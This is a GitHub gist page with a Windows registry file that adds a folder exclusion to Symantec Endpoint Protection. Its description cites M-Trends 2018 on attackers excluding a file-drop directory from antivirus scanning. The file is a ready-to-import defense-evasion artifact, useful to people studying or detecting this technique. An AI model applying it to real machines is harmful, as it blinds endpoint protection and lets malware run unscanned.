Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save Hello-xBugs/ab0dc91acea9da513d2d05d463762f86 to your computer and use it in GitHub Desktop.
Save Hello-xBugs/ab0dc91acea9da513d2d05d463762f86 to your computer and use it in GitHub Desktop.
Symantec Endpoint Protection directory exclusion registry key. According to M-Trends 2018, one of techniques used to overcome active AV scanning is to create a directory for files drop and to add it into AV's exclusion via registry.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Exclusions\ScanningEngines\Directory\Client\1733004144]
"Owner"=dword:00000004
"ProtectionTechnology"=dword:00000001
"FirstAction"=dword:00000011
"SecondAction"=dword:00000011
"DirectoryName"="C:\\to\\be\\excluded\\"
"ThreatName"="C:\\to\\be\\excluded\\"
"ExcludeSubDirs"=dword:00000001
"ExtensionList"=""
"ScanCategories"=dword:ffffffff
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment